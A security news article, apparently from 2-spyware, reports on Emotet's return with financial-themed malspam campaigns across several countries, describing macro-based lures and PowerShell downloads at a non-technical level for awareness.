After months of silence, Emotet came back with a new malspam campaign

Malicious email campaign targeting USA, Germany, Poland, Italy, and the United Kingdom spotted delivering malware-loader Emotet

Emotet malwareEmotet activity spiked again, new malspam campaigns were revealed. Researchers uncovered Emotet malware campaigns targeting businesses, government institutions, and individual users all over the world.[1] After staying still at the beginning of summer, banking malware broke the silence on August 22nd when C2 servers were noticed actively responding to requests. Such a behavior caught researchers' attention, and that's how they uncovered a new campaign.[2]

Malspam attack is mainly using “Payment Remittance Advice” and similar subject lines. It aims to trick people into opening attachments asking to enable malicious macros. That triggers commands and Emotet gets downloaded from compromised sites. In most cases, such pages are based on WordPress.

The list of websites compromised in this recent Emotet malware campaign:


Emotet malware becoming strong: targeting tens of thousands of emails

According to many reports, the malware is targeting almost 66 000 emails and is using 30 000 domain names. Mainly aiming to infect victims from Germany and Poland, Emotet trojan campaign was first spotted on Monday.[3] After obtaining stolen emails, virus creators are sending messages with executable files, download links, and other malicious components used to deliver Emotet.

Then malware acts as a downloader for other threats like Ryuk ransomware.[4]

From home users all the way up to government owned domains. The sender list includes the same dispersion as the targets. Many times we’ve seen precise targeting using a sender who’s contact list appears to have been scraped and used as the target list for that sender. This would include b2b as well as gov to gov.

Emotet was a banking trojan at first, and later on, it got re-written to function as a malware loader.[5] Trojan is one of the largest botnets, and this comeback was expected. However, the activity on servers, that was noticed back in August, resulted in a total re-establishment of the communications with infected bots and maximized the size of the botnet.

Different commands for victims from different parts of the world

The email notification itself, as usual for malspam, contains a financial-themed subject line and appears to be a continuous email from the previous conversation. As it is obvious from Polish and German malspam samples, the sender is using one of the following scenarios:

  • warning about the changes of the email address
  • informing about the invoice
  • claiming that there were problems with the bill

All these scenarios are used to convince the receiver to open the document attached and enable the malicious macro code.

After being analyzed further, malware campaign revealed that the particular Emotet variant is delivering email attachment containing either an alert from the Microsoft Office that claims about the license agreement or the warning that a copy of Word used by the victim will not work after September 20. Tactics like that help to trick people into allowing macros, other content, and installing Emotet on the computer.

As for Italian victims, the email contains the subject line “Numero Fattura 2019…” After being enabled, macros later run a PowerShell command that is using hacked website's URL and this is the place where the malicious payload can be retrieved from. The botnet is ready to attack businesses, so organizations should be aware that Emotet is back in action fully.

About the author
Gabriel E. Hall
Gabriel E. Hall - Passionate web researcher

Gabriel E. Hall is a passionate malware researcher who has been working for 2-spyware for almost a decade.

Contact Gabriel E. Hall
About the company Esolutions

Read in other languages